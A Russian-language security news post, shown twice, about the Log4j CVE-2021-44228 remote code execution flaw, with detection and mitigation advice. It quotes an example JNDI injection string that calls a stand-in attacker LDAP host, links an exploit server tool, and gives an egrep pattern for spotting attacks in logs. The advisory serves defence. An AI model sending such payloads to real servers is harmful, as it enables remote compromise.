 fox
II/IDEC networks :: lor-opennet.17 :: / Критическая уязвимость в Log4j позволяет выполнять произвольный код на сервере
|
Login |
[#]
Критическая уязвимость в Log4j позволяет выполнять произвольный код на сервере
Новостной_робот(mira, 1) — All
2021-12-11 06:00:01
Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов. Уязвимость является крайне опасной ввиду следующих причин: Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit. Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: Как бороться Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender. Проверить журнал приложения на предмет предпринятых атак можно при помощи egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath. Ссылки Официальная страница Log4j: [ https://logging.apache.org/log4j/2.x/ ]( https://logging.apache.org/log4j/2.x/ ) Log4j RCE Exploitation Detection: [ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ]( https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ) JNDIExploit: [ https://github.com/feihong-cs/JNDIExploit ]( https://github.com/feihong-cs/JNDIExploit ) Как работает JNDI Injection: [ https://www.veracode.com/blog/research/exploiting-jndi-injections-java ]( https://www.veracode.com/blog/research/exploiting-jndi-injections-java )
Ссылка: https://www.linux.org.ru/news/security/16685022
Новостной_робот(mira, 1) — All
2021-12-11 06:00:01
Опубликована критическая уязвимость CVE-2021-44228 в библиотеке Log4j языка Java. Библиотека разрабатывается с 2001 года в Арасhe Software Foundation и представляет собой фреймворк ведения логов. Уязвимость является крайне опасной ввиду следующих причин: Чрезвычайно широкое распростронение библиотеки в экосистеме Java Крайне простой эксплойт Возможность выполнения злоумышленником произвольной команды на сервере Возможность написания злоумышленником автоматических сканеров уязвимости в доступных из Интернет сервисах (тактика «spray and pray») Уязвимость работает путем передачи для записи в лог строки вида "${jndi:ldap://hackerownserver.com/resource}", при этом злоумышленник держит на hackerownserver.com сервер LDAP, специально настроенный для проведения атак вида «JNDI Injection», например JNDIExploit. Помимо схемы jndi:ldap: возможно использование jndi:rmi: и jndi:dns: Как бороться Уязвимыми следует считать Log4j версии 2.x. Версии 1.x уязвимы только при явном использовании JMSAppender. Проверить журнал приложения на предмет предпринятых атак можно при помощи egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' Для устранения уязвимости необходимо как можно скорее обновить Log4j до версии 2.15.0. Кроме того, если обновление невозможно в силу тех или иных причин, то обезопасить приложение можно путем установки системной переменной Java log4j2.formatMsgNoLookups в значение true (для Log4j 2.10+), или путем удаления класса JndiLookup из classpath. Ссылки Официальная страница Log4j: [ https://logging.apache.org/log4j/2.x/ ]( https://logging.apache.org/log4j/2.x/ ) Log4j RCE Exploitation Detection: [ https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ]( https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b ) JNDIExploit: [ https://github.com/feihong-cs/JNDIExploit ]( https://github.com/feihong-cs/JNDIExploit ) Как работает JNDI Injection: [ https://www.veracode.com/blog/research/exploiting-jndi-injections-java ]( https://www.veracode.com/blog/research/exploiting-jndi-injections-java )
Ссылка: https://www.linux.org.ru/news/security/16685022